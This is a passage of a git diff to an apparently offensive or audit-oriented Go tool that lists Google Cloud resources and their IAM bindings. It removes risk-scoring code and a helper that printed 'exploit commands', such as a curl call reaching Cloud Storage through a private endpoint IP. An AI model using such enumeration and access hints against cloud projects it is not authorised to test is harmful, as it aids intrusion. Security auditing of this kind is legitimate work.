IAPSettingsInfo struct { CORSAllowedOrigins []string `json:"corsAllowedOrigins"` GCIPTenantIDs []string `json:"gcipTenantIds"` ReauthPolicy string `json:"reauthPolicy"` - RiskLevel string `json:"riskLevel"` - RiskReasons []string `json:"riskReasons"` } // TunnelDestGroup represents an IAP tunnel destination group type TunnelDestGroup struct { - Name string `json:"name"` - ProjectID string `json:"projectId"` - Region string `json:"region"` - CIDRs []string `json:"cidrs"` - FQDNs []string `json:"fqdns"` - RiskLevel string `json:"riskLevel"` - RiskReasons []string `json:"riskReasons"` + Name string `json:"name"` + ProjectID string `json:"projectId"` + Region string `json:"region"` + CIDRs []string `json:"cidrs"` + FQDNs []string `json:"fqdns"` + IAMBindings []IAMBinding `json:"iamBindings"` } -// IAPBinding represents an IAM binding for IAP -type IAPBinding struct { - Resource string `json:"resource"` - ProjectID string `json:"projectId"` - Role string `json:"role"` - Members []string `json:"members"` - RiskLevel string `json:"riskLevel"` - RiskReasons []string `json:"riskReasons"` +// IAMBinding represents a single IAM role binding +type IAMBinding struct { + Role string `json:"role"` + Member string `json:"member"` } // ListTunnelDestGroups retrieves tunnel destination groups @@ -88,14 +81,16 @@ func (s *IAPService) ListTunnelDestGroups(projectID string) ([]TunnelDestGroup, for _, group := range resp.TunnelDestGroups { info := TunnelDestGroup{ - Name: extractName(group.Name), - ProjectID: projectID, - Region: region, - CIDRs: group.Cidrs, - FQDNs: group.Fqdns, - RiskReasons: []string{}, + Name: extractName(group.Name), + ProjectID: projectID, + Region: region, + CIDRs: group.Cidrs, + FQDNs: group.Fqdns, } - info.RiskLevel, info.RiskReasons = s.analyzeDestGroupRisk(info) + + // Fetch IAM bindings for this tunnel dest group + info.IAMBindings = s.getTunnelDestGroupIAMBindings(service, group.Name) + groups = append(groups, info) } } @@ -103,6 +98,28 @@ func (s *IAPService) ListTunnelDestGroups(projectID string) ([]TunnelDestGroup, return groups, nil } +// getTunnelDestGroupIAMBindings retrieves IAM bindings for a tunnel destination group +func (s *IAPService) getTunnelDestGroupIAMBindings(service *iap.Service, resourceName string) []IAMBinding { + ctx := context.Background() + + policy, err := service.V1.GetIamPolicy(resourceName, &iap.GetIamPolicyRequest{}).Context(ctx).Do() + if err != nil { + return nil + } + + var bindings []IAMBinding + for _, binding := range policy.Bindings { + for _, member := range binding.Members { + bindings = append(bindings, IAMBinding{ + Role: binding.Role, + Member: member, + }) + } + } + + return bindings +} + // GetIAPSettings retrieves IAP settings for a resource func (s *IAPService) GetIAPSettings(projectID, resourcePath string) (*IAPSettingsInfo, error) { ctx := context.Background() @@ -127,7 +144,6 @@ func (s *IAPService) GetIAPSettings(projectID, resourcePath string) (*IAPSetting Name: settings.Name, ProjectID: projectID, ResourceName: resourcePath, - RiskReasons: []string{}, } if settings.AccessSettings != nil { @@ -144,139 +160,9 @@ func (s *IAPService) GetIAPSettings(projectID, resourcePath string) (*IAPSetting } } - info.RiskLevel, info.RiskReasons = s.analyzeSettingsRisk(*info) - return info, nil } -// GetIAPBindings retrieves IAM bindings for an IAP-protected resource -func (s *IAPService) GetIAPBindings(projectID, resourcePath string) ([]IAPBinding, error) { - ctx := context.Background() - var service *iap.Service - var err error - - if s.session != nil { - service, err = iap.NewService(ctx, s.session.GetClientOption()) - } else { - service, err = iap.NewService(ctx) - } - if err != nil { - return nil, gcpinternal.ParseGCPError(err, "iap.googleapis.com") - } - - policy, err := service.V1.GetIamPolicy(resourcePath, &iap.GetIamPolicyRequest{}).Context(ctx).Do() - if err != nil { - return nil, gcpinternal.ParseGCPError(err, "iap.googleapis.com") - } - - var bindings []IAPBinding - for _, binding := range policy.Bindings { - info := IAPBinding{ - Resource: resourcePath, - ProjectID: projectID, - Role: binding.Role, - Members: binding.Members, - RiskReasons: []string{}, - } - info.RiskLevel, info.RiskReasons = s.analyzeBindingRisk(info) - bindings = append(bindings, info) - } - - return bindings, nil -} - -func (s *IAPService) analyzeDestGroupRisk(group TunnelDestGroup) (string, []string) { - var reasons []string - score := 0 - - // Wide CIDR ranges - for _, cidr := range group.CIDRs { - if cidr == "0.0.0.0/0" || cidr == "::/0" { - reasons = append(reasons, "Allows tunneling to any IP (0.0.0.0/0)") - score += 3 - break - } - // Check for /8 or larger - if strings.HasSuffix(cidr, "/8") || strings.HasSuffix(cidr, "/0") { - reasons = append(reasons, fmt.Sprintf("Very broad CIDR range: %s", cidr)) - score += 2 - } - } - - // Many FQDNs - if len(group.FQDNs) > 10 { - reasons = append(reasons, fmt.Sprintf("Large number of FQDNs: %d", len(group.FQDNs))) - score += 1 - } - - if score >= 3 { - return "HIGH", reasons - } else if score >= 2 { - return "MEDIUM", reasons - } else if score >= 1 { - return "LOW", reasons - } - return "INFO", reasons -} - -func (s *IAPService) analyzeSettingsRisk(settings IAPSettingsInfo) (string, []string) { - var reasons []string - score := 0 - - // No reauth policy - if settings.ReauthPolicy == "" || settings.ReauthPolicy == "DISABLED" { - reasons = append(reasons, "No reauthentication policy configured") - score += 1 - } - - // Wide CORS - for _, origin := range settings.CORSAllowedOrigins { - if origin == "*" { - reasons = append(reasons, "CORS allows all origins") - score += 2 - break - } - } - - if score >= 2 { - return "MEDIUM", reasons - } else if score >= 1 { - return "LOW", reasons - } - return "INFO", reasons -} - -func (s *IAPService) analyzeBindingRisk(binding IAPBinding) (string, []string) { - var reasons []string - score := 0 - - // Check for public access - for _, member := range binding.Members { - if member == "allUsers" { - reasons = append(reasons, "IAP resource allows allUsers") - score += 3 - } else if member == "allAuthenticatedUsers" { - reasons = append(reasons, "IAP resource allows allAuthenticatedUsers") - score += 2 - } - } - - // Sensitive roles - if strings.Contains(binding.Role, "admin") || strings.Contains(binding.Role, "Admin") { - reasons = append(reasons, fmt.Sprintf("Admin role granted: %s", binding.Role)) - score += 1 - } - - if score >= 3 { - return "HIGH", reasons - } else if score >= 2 { - return "MEDIUM", reasons - } else if score >= 1 { - return "LOW", reasons - } - return "INFO", reasons -} - func extractName(fullPath string) string { parts := strings.Split(fullPath, "/") if len(parts) > 0 { diff --git a/gcp/services/kmsService/kmsService.go b/gcp/services/kmsService/kmsService.go index be28f325..097dd801 100644 --- a/gcp/services/kmsService/kmsService.go +++ b/gcp/services/kmsService/kmsService.go @@ -26,6 +26,12 @@ type KeyRingInfo struct { KeyCount int } +// IAMBinding represents a single IAM role binding +type IAMBinding struct { + Role string + Member string +} + // CryptoKeyInfo holds KMS crypto key details with security-relevant information type CryptoKeyInfo struct { Name string @@ -53,9 +59,7 @@ type CryptoKeyInfo struct { Labels map[string]string // IAM - EncrypterMembers []string - DecrypterMembers []string - AdminMembers []string + IAMBindings []IAMBinding IsPublicEncrypt bool IsPublicDecrypt bool } @@ -124,8 +128,7 @@ func (ks *KMSService) CryptoKeys(projectID string) ([]CryptoKeyInfo, error) { // Try to get IAM policy iamPolicy, iamErr := ks.getKeyIAMPolicy(service, key.Name) if iamErr == nil && iamPolicy != nil { - info.EncrypterMembers, info.DecrypterMembers, info.AdminMembers, - info.IsPublicEncrypt, info.IsPublicDecrypt = parseKeyBindings(iamPolicy) + info.IAMBindings, info.IsPublicEncrypt, info.IsPublicDecrypt = parseKeyBindings(iamPolicy) } keys = append(keys, info) @@ -231,35 +234,27 @@ func (ks *KMSService) getKeyIAMPolicy(service *kms.Service, keyName string) (*km return policy, nil } -// parseKeyBindings extracts who has key permissions and checks for public access -func parseKeyBindings(policy *kms.Policy) (encrypters []string, decrypters []string, admins []string, publicEncrypt bool, publicDecrypt bool) { +// parseKeyBindings extracts all IAM bindings and checks for public access +func parseKeyBindings(policy *kms.Policy) (bindings []IAMBinding, publicEncrypt bool, publicDecrypt bool) { for _, binding := range policy.Bindings { - switch binding.Role { - case "roles/cloudkms.cryptoKeyEncrypter": - encrypters = append(encrypters, binding.Members...) - for _, member := range binding.Members { - if member == "allUsers" || member == "allAuthenticatedUsers" { + for _, member := range binding.Members { + bindings = append(bindings, IAMBinding{ + Role: binding.Role, + Member: member, + }) + + // Check for public access on encrypt/decrypt roles + if member == "allUsers" || member == "allAuthenticatedUsers" { + switch binding.Role { + case "roles/cloudkms.cryptoKeyEncrypter": publicEncrypt = true - } - } - case "roles/cloudkms.cryptoKeyDecrypter": - decrypters = append(decrypters, binding.Members...) - for _, member := range binding.Members { - if member == "allUsers" || member == "allAuthenticatedUsers" { + case "roles/cloudkms.cryptoKeyDecrypter": publicDecrypt = true - } - } - case "roles/cloudkms.cryptoKeyEncrypterDecrypter": - encrypters = append(encrypters, binding.Members...) - decrypters = append(decrypters, binding.Members...) - for _, member := range binding.Members { - if member == "allUsers" || member == "allAuthenticatedUsers" { + case "roles/cloudkms.cryptoKeyEncrypterDecrypter": publicEncrypt = true publicDecrypt = true } } - case "roles/cloudkms.admin": - admins = append(admins, binding.Members...) } } return diff --git a/gcp/services/loadbalancerService/loadbalancerService.go b/gcp/services/loadbalancerService/loadbalancerService.go index a2b8661a..5c9b66b3 100644 --- a/gcp/services/loadbalancerService/loadbalancerService.go +++ b/gcp/services/loadbalancerService/loadbalancerService.go @@ -43,10 +43,6 @@ type LoadBalancerInfo struct { // Security config SecurityPolicy string `json:"securityPolicy"` // Cloud Armor - - // Security analysis - RiskLevel string `json:"riskLevel"` - RiskReasons []string `json:"riskReasons"` } // SSLPolicyInfo represents an SSL policy @@ -56,8 +52,6 @@ type SSLPolicyInfo struct { MinTLSVersion string `json:"minTlsVersion"` Profile string `json:"profile"` // COMPATIBLE, MODERN, RESTRICTED, CUSTOM CustomFeatures []string `json:"customFeatures"` - RiskLevel string `json:"riskLevel"` - RiskReasons []string `json:"riskReasons"` } // BackendServiceInfo represents a backend service @@ -72,8 +66,6 @@ type BackendServiceInfo struct { SessionAffinity string `json:"sessionAffinity"` ConnectionDraining int64 `json:"connectionDraining"` Backends []string `json:"backends"` - RiskLevel string `json:"riskLevel"` - RiskReasons []string `json:"riskReasons"` } // ListLoadBalancers retrieves all load balancers in a project @@ -148,9 +140,7 @@ func (s *LoadBalancerService) ListSSLPolicies(projectID string) ([]SSLPolicyInfo MinTLSVersion: policy.MinTlsVersion, Profile: policy.Profile, CustomFeatures: policy.CustomFeatures, - RiskReasons: []string{}, } - info.RiskLevel, info.RiskReasons = s.analyzeSSLPolicyRisk(info) policies = append(policies, info) } @@ -202,13 +192,12 @@ func (s *LoadBalancerService) ListBackendServices(projectID string) ([]BackendSe func (s *LoadBalancerService) parseForwardingRule(rule *compute.ForwardingRule, projectID, region string) LoadBalancerInfo { info := LoadBalancerInfo{ - Name: rule.Name, - ProjectID: projectID, - Region: region, - IPAddress: rule.IPAddress, - Port: rule.PortRange, - Protocol: rule.IPProtocol, - RiskReasons: []string{}, + Name: rule.Name, + ProjectID: projectID, + Region: region, + IPAddress: rule.IPAddress, + Port: rule.PortRange, + Protocol: rule.IPProtocol, } // Determine load balancer type @@ -238,20 +227,17 @@ func (s *LoadBalancerService) parseForwardingRule(rule *compute.ForwardingRule, info.BackendServices = []string{extractName(rule.BackendService)} } - info.RiskLevel, info.RiskReasons = s.analyzeLoadBalancerRisk(info) - return info } func (s *LoadBalancerService) parseBackendService(backend *compute.BackendService, projectID string) BackendServiceInfo { info := BackendServiceInfo{ - Name: backend.Name, - ProjectID: projectID, - Protocol: backend.Protocol, - Port: backend.Port, - EnableCDN: backend.EnableCDN, - SessionAffinity: backend.SessionAffinity, - RiskReasons: []string{}, + Name: backend.Name, + ProjectID: projectID, + Protocol: backend.Protocol, + Port: backend.Port, + EnableCDN: backend.EnableCDN, + SessionAffinity: backend.SessionAffinity, } if backend.SecurityPolicy != "" { @@ -270,8 +256,6 @@ func (s *LoadBalancerService) parseBackendService(backend *compute.BackendServic info.Backends = append(info.Backends, extractName(be.Group)) } - info.RiskLevel, info.RiskReasons = s.analyzeBackendServiceRisk(info) - return info } @@ -280,91 +264,6 @@ func (s *LoadBalancerService) parseRegionalBackendService(backend *compute.Backe return info } -func (s *LoadBalancerService) analyzeLoadBalancerRisk(lb LoadBalancerInfo) (string, []string) { - var reasons []string - score := 0 - - // External load balancer - if lb.Scheme == "EXTERNAL" { - reasons = append(reasons, "External-facing load balancer") - score += 1 - } - - // No SSL for external - if lb.Scheme == "EXTERNAL" && lb.Type != "HTTPS" && lb.Type != "SSL_PROXY" { - reasons = append(reasons, "External LB without HTTPS/SSL") - score += 2 - } - - // Check for weak SSL policy would require additional lookup - if lb.SSLPolicy == "" && (lb.Type == "HTTPS" || lb.Type == "SSL_PROXY") { - reasons = append(reasons, "No custom SSL policy (using default)") - score += 1 - } - - if score >= 3 { - return "HIGH", reasons - } else if score >= 2 { - return "MEDIUM", reasons - } else if score >= 1 { - return "LOW", reasons - } - return "INFO", reasons -} - -func (s *LoadBalancerService) analyzeSSLPolicyRisk(policy SSLPolicyInfo) (string, []string) { - var reasons []string - score := 0 - - // Weak TLS version - if policy.MinTLSVersion == "TLS_1_0" { - reasons = append(reasons, "Allows TLS 1.0 (deprecated)") - score += 3 - } else if policy.MinTLSVersion == "TLS_1_1" { - reasons = append(reasons, "Allows TLS 1.1 (deprecated)") - score += 2 - } - - // COMPATIBLE profile allows weak ciphers - if policy.Profile == "COMPATIBLE" { - reasons = append(reasons, "COMPATIBLE profile allows weak ciphers") - score += 1 - } - - if score >= 3 { - return "HIGH", reasons - } else if score >= 2 { - return "MEDIUM", reasons - } else if score >= 1 { - return "LOW", reasons - } - return "INFO", reasons -} - -func (s *LoadBalancerService) analyzeBackendServiceRisk(backend BackendServiceInfo) (string, []string) { - var reasons []string - score := 0 - - // No Cloud Armor policy - if backend.SecurityPolicy == "" { - reasons = append(reasons, "No Cloud Armor security policy attached") - score += 1 - } - - // No health check - if backend.HealthCheck == "" { - reasons = append(reasons, "No health check configured") - score += 1 - } - - if score >= 2 { - return "MEDIUM", reasons - } else if score >= 1 { - return "LOW", reasons - } - return "INFO", reasons -} - func extractName(fullPath string) string { parts := strings.Split(fullPath, "/") if len(parts) > 0 { diff --git a/gcp/services/memorystoreService/memorystoreService.go b/gcp/services/memorystoreService/memorystoreService.go index 52c48a8e..dd3fd006 100644 --- a/gcp/services/memorystoreService/memorystoreService.go +++ b/gcp/services/memorystoreService/memorystoreService.go @@ -23,24 +23,22 @@ func NewWithSession(session *gcpinternal.SafeSession) *MemorystoreService { // RedisInstanceInfo represents a Redis instance type RedisInstanceInfo struct { - Name string `json:"name"` - ProjectID string `json:"projectId"` - Location string `json:"location"` - DisplayName string `json:"displayName"` - Tier string `json:"tier"` // BASIC or STANDARD_HA - MemorySizeGB int64 `json:"memorySizeGb"` - RedisVersion string `json:"redisVersion"` - Host string `json:"host"` - Port int64 `json:"port"` - State string `json:"state"` - AuthEnabled bool `json:"authEnabled"` - TransitEncryption string `json:"transitEncryption"` // DISABLED, SERVER_AUTHENTICATION - ConnectMode string `json:"connectMode"` // DIRECT_PEERING or PRIVATE_SERVICE_ACCESS - AuthorizedNetwork string `json:"authorizedNetwork"` - ReservedIPRange string `json:"reservedIpRange"` - CreateTime string `json:"createTime"` - RiskLevel string `json:"riskLevel"` - RiskReasons []string `json:"riskReasons"` + Name string `json:"name"` + ProjectID string `json:"projectId"` + Location string `json:"location"` + DisplayName string `json:"displayName"` + Tier string `json:"tier"` // BASIC or STANDARD_HA + MemorySizeGB int64 `json:"memorySizeGb"` + RedisVersion string `json:"redisVersion"` + Host string `json:"host"` + Port int64 `json:"port"` + State string `json:"state"` + AuthEnabled bool `json:"authEnabled"` + TransitEncryption string `json:"transitEncryption"` // DISABLED, SERVER_AUTHENTICATION + ConnectMode string `json:"connectMode"` // DIRECT_PEERING or PRIVATE_SERVICE_ACCESS + AuthorizedNetwork string `json:"authorizedNetwork"` + ReservedIPRange string `json:"reservedIpRange"` + CreateTime string `json:"createTime"` } // ListRedisInstances retrieves all Redis instances in a project @@ -77,7 +75,7 @@ func (s *MemorystoreService) ListRedisInstances(projectID string) ([]RedisInstan } func (s *MemorystoreService) parseRedisInstance(instance *redis.Instance, projectID string) RedisInstanceInfo { - info := RedisInstanceInfo{ + return RedisInstanceInfo{ Name: extractName(instance.Name), ProjectID: projectID, Location: instance.LocationId, @@ -94,41 +92,7 @@ func (s *MemorystoreService) parseRedisInstance(instance *redis.Instance, projec AuthorizedNetwork: instance.AuthorizedNetwork, ReservedIPRange: instance.ReservedIpRange, CreateTime: instance.CreateTime, - RiskReasons: []string{}, } - - // Security analysis - info.RiskLevel, info.RiskReasons = s.analyzeRedisRisk(info) - return info -} - -func (s *MemorystoreService) analyzeRedisRisk(instance RedisInstanceInfo) (string, []string) { - var reasons []string - score := 0 - - if !instance.AuthEnabled { - reasons = append(reasons, "Authentication not enabled") - score += 3 - } - - if instance.TransitEncryption == "DISABLED" || instance.TransitEncryption == "" { - reasons = append(reasons, "Transit encryption disabled") - score += 2 - } - - if instance.Tier == "BASIC" { - reasons = append(reasons, "Basic tier (no HA)") - score += 1 - } - - if score >= 4 { - return "HIGH", reasons - } else if score >= 2 { - return "MEDIUM", reasons - } else if score >= 1 { - return "LOW", reasons - } - return "INFO", reasons } func extractName(fullName string) string { diff --git a/gcp/services/networkEndpointsService/networkEndpointsService.go b/gcp/services/networkEndpointsService/networkEndpointsService.go index d60e092b..77debf52 100644 --- a/gcp/services/networkEndpointsService/networkEndpointsService.go +++ b/gcp/services/networkEndpointsService/networkEndpointsService.go @@ -18,47 +18,47 @@ func New() *NetworkEndpointsService { // PrivateServiceConnectEndpoint represents a PSC endpoint type PrivateServiceConnectEndpoint struct { - Name string `json:"name"` - ProjectID string `json:"projectId"` - Region string `json:"region"` - Network string `json:"network"` - Subnetwork string `json:"subnetwork"` - IPAddress string `json:"ipAddress"` - Target string `json:"target"` // Service attachment or API - TargetType string `json:"targetType"` // google-apis, service-attachment - ConnectionState string `json:"connectionState"` - RiskLevel string `json:"riskLevel"` - RiskReasons []string `json:"riskReasons"` - ExploitCommands []string `json:"exploitCommands"` + Name string `json:"name"` + ProjectID string `json:"projectId"` + Region string `json:"region"` + Network string `json:"network"` + Subnetwork string `json:"subnetwork"` + IPAddress string `json:"ipAddress"` + Target string `json:"target"` // Service attachment or API + TargetType string `json:"targetType"` // google-apis, service-attachment + ConnectionState string `json:"connectionState"` } // PrivateConnection represents a private service connection (e.g., for Cloud SQL) type PrivateConnection struct { - Name string `json:"name"` - ProjectID string `json:"projectId"` - Network string `json:"network"` - Service string `json:"service"` - ReservedRanges []string `json:"reservedRanges"` - PeeringName string `json:"peeringName"` - RiskLevel string `json:"riskLevel"` - RiskReasons []string `json:"riskReasons"` + Name string `json:"name"` + ProjectID string `json:"projectId"` + Network string `json:"network"` + Service string `json:"service"` + ReservedRanges []string `json:"reservedRanges"` + PeeringName string `json:"peeringName"` AccessibleServices []string `json:"accessibleServices"` } +// ServiceAttachmentIAMBinding represents an IAM binding for a service attachment +type ServiceAttachmentIAMBinding struct { + Role string `json:"role"` + Member string `json:"member"` +} + // ServiceAttachment represents a PSC service attachment (producer side) type ServiceAttachment struct { - Name string `json:"name"` - ProjectID string `json:"projectId"` - Region string `json:"region"` - TargetService string `json:"targetService"` - ConnectionPreference string `json:"connectionPreference"` // ACCEPT_AUTOMATIC, ACCEPT_MANUAL - ConsumerAcceptLists []string `json:"consumerAcceptLists"` - ConsumerRejectLists []string `json:"consumerRejectLists"` - EnableProxyProtocol bool `json:"enableProxyProtocol"` - NatSubnets []string `json:"natSubnets"` - ConnectedEndpoints int `json:"connectedEndpoints"` - RiskLevel string `json:"riskLevel"` - RiskReasons []string `json:"riskReasons"` + Name string `json:"name"` + ProjectID string `json:"projectId"` + Region string `json:"region"` + TargetService string `json:"targetService"` + ConnectionPreference string `json:"connectionPreference"` // ACCEPT_AUTOMATIC, ACCEPT_MANUAL + ConsumerAcceptLists []string `json:"consumerAcceptLists"` + ConsumerRejectLists []string `json:"consumerRejectLists"` + EnableProxyProtocol bool `json:"enableProxyProtocol"` + NatSubnets []string `json:"natSubnets"` + ConnectedEndpoints int `json:"connectedEndpoints"` + IAMBindings []ServiceAttachmentIAMBinding `json:"iamBindings"` } // GetPrivateServiceConnectEndpoints retrieves PSC forwarding rules @@ -105,16 +105,14 @@ func (s *NetworkEndpointsService) GetPrivateServiceConnectEndpoints(projectID st } endpoint := PrivateServiceConnectEndpoint{ - Name: rule.Name, - ProjectID: projectID, - Region: regionName, - Network: extractName(rule.Network), - Subnetwork: extractName(rule.Subnetwork), - IPAddress: rule.IPAddress, - Target: rule.Target, - TargetType: targetType, - RiskReasons: []string{}, - ExploitCommands: []string{}, + Name: rule.Name, + ProjectID: projectID, + Region: regionName, + Network: extractName(rule.Network), + Subnetwork: extractName(rule.Subnetwork), + IPAddress: rule.IPAddress, + Target: rule.Target, + TargetType: targetType, } // Check connection state (for PSC endpoints to service attachments) @@ -124,9 +122,6 @@ func (s *NetworkEndpointsService) GetPrivateServiceConnectEndpoints(projectID st endpoint.ConnectionState = "ACTIVE" } - endpoint.RiskLevel, endpoint.RiskReasons = s.analyzePSCRisk(endpoint) - endpoint.ExploitCommands = s.generatePSCExploitCommands(endpoint) - endpoints = append(endpoints, endpoint) } } @@ -176,14 +171,11 @@ func (s *NetworkEndpointsService) GetPrivateConnections(projectID string) ([]Pri Service: conn.Service, ReservedRanges: conn.ReservedPeeringRanges, PeeringName: conn.Peering, - RiskReasons: []string{}, } // Determine accessible services based on the connection connection.AccessibleServices = s.determineAccessibleServices(conn.Service) - connection.RiskLevel, connection.RiskReasons = s.analyzeConnectionRisk(connection) - connections = append(connections, connection) } } @@ -217,7 +209,6 @@ func (s *NetworkEndpointsService) GetServiceAttachments(projectID string) ([]Ser TargetService: extractName(attachment.TargetService), ConnectionPreference: attachment.ConnectionPreference, EnableProxyProtocol: attachment.EnableProxyProtocol, - RiskReasons: []string{}, } // Extract NAT subnets @@ -238,7 +229,8 @@ func (s *NetworkEndpointsService) GetServiceAttachments(projectID string) ([]Ser sa.ConsumerRejectLists = append(sa.ConsumerRejectLists, reject) } - sa.RiskLevel, sa.RiskReasons = s.analyzeAttachmentRisk(sa) + // Get IAM bindings for the service attachment + sa.IAMBindings = s.getServiceAttachmentIAMBindings(ctx, service, projectID, regionName, attachment.Name) attachments = append(attachments, sa) } @@ -249,79 +241,26 @@ func (s *NetworkEndpointsService) GetServiceAttachments(projectID string) ([]Ser return attachments, err } -func (s *NetworkEndpointsService) analyzePSCRisk(endpoint PrivateServiceConnectEndpoint) (string, []string) { - var reasons []string - score := 0 - - if endpoint.TargetType == "google-apis" { - reasons = append(reasons, "PSC endpoint to Google APIs - internal access to GCP services") - score += 1 - } - - if endpoint.TargetType == "service-attachment" { - reasons = append(reasons, "PSC endpoint to service attachment - access to producer service") - score += 1 - } - - if endpoint.ConnectionState == "ACCEPTED" || endpoint.ConnectionState == "ACTIVE" { - reasons = append(reasons, "Connection is active") - score += 1 - } - - if score >= 2 { - return "MEDIUM", reasons - } else if score >= 1 { - return "LOW", reasons - } - return "INFO", reasons -} - -func (s *NetworkEndpointsService) generatePSCExploitCommands(endpoint PrivateServiceConnectEndpoint) []string { - var commands []string - - commands = append(commands, - fmt.Sprintf("# PSC Endpoint: %s", endpoint.Name), - fmt.Sprintf("# IP Address: %s", endpoint.IPAddress), - fmt.Sprintf("# Network: %s", endpoint.Network), - ) - - if endpoint.TargetType == "google-apis" { - commands = append(commands, - "# This endpoint provides private access to Google APIs", - "# From instances in this VPC, access Google APIs via this IP:", - fmt.Sprintf("# curl -H 'Host: storage.googleapis.com' https://%s/storage/v1/b", endpoint.IPAddress), - ) - } else if endpoint.TargetType == "service-attachment" { - commands = append(commands, - "# This endpoint connects to a producer service", - fmt.Sprintf("# Target: %s", endpoint.Target), - fmt.Sprintf("# Connect from VPC instance to: %s", endpoint.IPAddress), - ) - } - - return commands -} - -func (s *NetworkEndpointsService) analyzeConnectionRisk(connection PrivateConnection) (string, []string) { - var reasons []string - score := 0 - - if len(connection.ReservedRanges) > 0 { - reasons = append(reasons, fmt.Sprintf("Has %d reserved IP range(s)", len(connection.ReservedRanges))) - score += 1 - } - - if len(connection.AccessibleServices) > 0 { - reasons = append(reasons, fmt.Sprintf("Provides access to: %s", strings.Join(connection.AccessibleServices, ", "))) - score += 1 +// getServiceAttachmentIAMBindings retrieves IAM bindings for a service attachment +func (s *NetworkEndpointsService) getServiceAttachmentIAMBindings(ctx context.Context, service *compute.Service, projectID, region, attachmentName string) []ServiceAttachmentIAMBinding { + policy, err := service.ServiceAttachments.GetIamPolicy(projectID, region, attachmentName).Context(ctx).Do() + if err != nil { + return nil } - if score >= 2 { - return "MEDIUM", reasons - } else if score >= 1 { - return "LOW", reasons + var bindings []ServiceAttachmentIAMBinding + for _, binding := range policy.Bindings { + if binding == nil { + continue + } + for _, member := range binding.Members { + bindings = append(bindings, ServiceAttachmentIAMBinding{ + Role: binding.Role, + Member: member, + }) + } } - return "INFO", reasons + return bindings } func (s *NetworkEndpointsService) determineAccessibleServices(service string) []string { @@ -336,35 +275,6 @@ func (s *NetworkEndpointsService) determineAccessibleServices(service string) [] return []string{service} } -func (s *NetworkEndpointsService) analyzeAttachmentRisk(attachment ServiceAttachment) (string, []string) { - var reasons []string - score := 0 - - if attachment.ConnectionPreference == "ACCEPT_AUTOMATIC" { - reasons = append(reasons, "Auto-accepts connections from any project") - score += 2 - } - - if len(attachment.ConsumerAcceptLists) == 0 && attachment.ConnectionPreference == "ACCEPT_MANUAL" { - reasons = append(reasons, "No explicit accept list - manual review required") - score += 1 - } - - if attachment.ConnectedEndpoints > 0 { - reasons = append(reasons, fmt.Sprintf("Has %d connected consumer endpoint(s)", attachment.ConnectedEndpoints)) - score += 1 - } - - if score >= 3 { - return "HIGH", reasons - } else if score >= 2 { - return "MEDIUM", reasons - } else if score >= 1 { - return "LOW", reasons - } - return "INFO", reasons -} - func extractName(fullPath string) string { parts := strings.Split(fullPath, "/") if len(parts) > 0 { diff --git a/gcp/services/networkService/networkService.go b/gcp/services/networkService/networkService.go index 33257b39..c104ea2c 100644 --- a/gcp/services/networkService/networkService.go +++ b/gcp/services/networkService/networkService.go @@ -333,8 +333,7 @@ type FirewallRuleInfo struct { IsPublicIngress bool // 0.0.0.0/0 in source ranges IsPublicEgress bool // 0.0.0.0/0 in destination ranges AllowsAllPorts bool // Empty ports = all ports - RiskLevel string // HIGH, MEDIUM, LOW - SecurityIssues []string + LoggingEnabled bool // Firewall logging enabled } // Networks retrieves all VPC networks in a project @@ -487,89 +486,29 @@ func (ns *NetwworkService) FirewallRulesEnhanced(projectID string) ([]FirewallRu info.DeniedProtocols[denied.IPProtocol] = denied.Ports } - // Security analysis - analyzeFirewallRule(&info) - - rules = append(rules, info) - } - - return rules, nil -} - -// analyzeFirewallRule performs security analysis on a firewall rule -func analyzeFirewallRule(rule *FirewallRuleInfo) { - // Check for public ingress (0.0.0.0/0 in source ranges) - for _, source := range rule.SourceRanges { - if source == "0.0.0.0/0" || source == "::/0" { - rule.IsPublicIngress = true - break - } - } - - // Check for public egress - for _, dest := range rule.DestinationRanges { - if dest == "0.0.0.0/0" || dest == "::/0" { - rule.IsPublicEgress = true - break + // Security analysis - check for public ingress/egress + for _, source := range fw.SourceRanges { + if source == "0.0.0.0/0" || source == "::/0" { + info.IsPublicIngress = true + break + } } - } - - // Determine risk level and security issues - if rule.Direction == "INGRESS" && rule.IsPublicIngress && len(rule.AllowedProtocols) > 0 { - // Check for high-risk configurations - for proto, ports := range rule.AllowedProtocols { - if len(ports) == 0 { - // All ports allowed - rule.SecurityIssues = append(rule.SecurityIssues, - "Allows all "+proto+" ports from 0.0.0.0/0") - rule.RiskLevel = "HIGH" - } else { - // Check for sensitive ports - for _, port := range ports { - if isSensitivePort(port) { - rule.SecurityIssues = append(rule.SecurityIssues, - "Exposes sensitive port "+port+" ("+proto+") to internet") - if rule.RiskLevel != "HIGH" { - rule.RiskLevel = "HIGH" - } - } - } + for _, dest := range fw.DestinationRanges { + if dest == "0.0.0.0/0" || dest == "::/0" { + info.IsPublicEgress = true + break } } - if rule.RiskLevel == "" && rule.IsPublicIngress { - rule.RiskLevel = "MEDIUM" - rule.SecurityIssues = append(rule.SecurityIssues, "Allows ingress from 0.0.0.0/0") + // Check if logging is enabled + if fw.LogConfig != nil && fw.LogConfig.Enable { + info.LoggingEnabled = true } - } - if rule.RiskLevel == "" { - rule.RiskLevel = "LOW" - } - - // Check if no target restrictions (applies to all instances) - if len(rule.TargetTags) == 0 && len(rule.TargetSAs) == 0 && rule.IsPublicIngress { - rule.SecurityIssues = append(rule.SecurityIssues, "No target restrictions - applies to ALL instances in network") + rules = append(rules, info) } -} -// isSensitivePort checks if a port is considered sensitive -func isSensitivePort(port string) bool { - sensitivePorts := map[string]bool{ - "22": true, "3389": true, "5985": true, "5986": true, // Remote access - "3306": true, "5432": true, "1433": true, "1521": true, "27017": true, // Databases - "6379": true, "11211": true, // Caches - "9200": true, "9300": true, // Elasticsearch - "2379": true, "2380": true, // etcd - "8080": true, "8443": true, // Common web - "23": true, // Telnet - "21": true, "20": true, // FTP - "25": true, "587": true, "465": true, // SMTP - "110": true, "143": true, // POP3/IMAP - "445": true, "139": true, // SMB - "135": true, // RPC - } - return sensitivePorts[port] + return rules, nil } // Helper functions diff --git a/gcp/services/notebooksService/notebooksService.go b/gcp/services/notebooksService/notebooksService.go index d9ca5e2e..fd7bed6f 100644 --- a/gcp/services/notebooksService/notebooksService.go +++ b/gcp/services/notebooksService/notebooksService.go @@ -23,51 +23,47 @@ func NewWithSession(session *gcpinternal.SafeSession) *NotebooksService { // NotebookInstanceInfo represents a Vertex AI Workbench or legacy notebook instance type NotebookInstanceInfo struct { - Name string `json:"name"` - ProjectID string `json:"projectId"` - Location string `json:"location"` - State string `json:"state"` - MachineType string `json:"machineType"` - ServiceAccount string `json:"serviceAccount"` - Network string 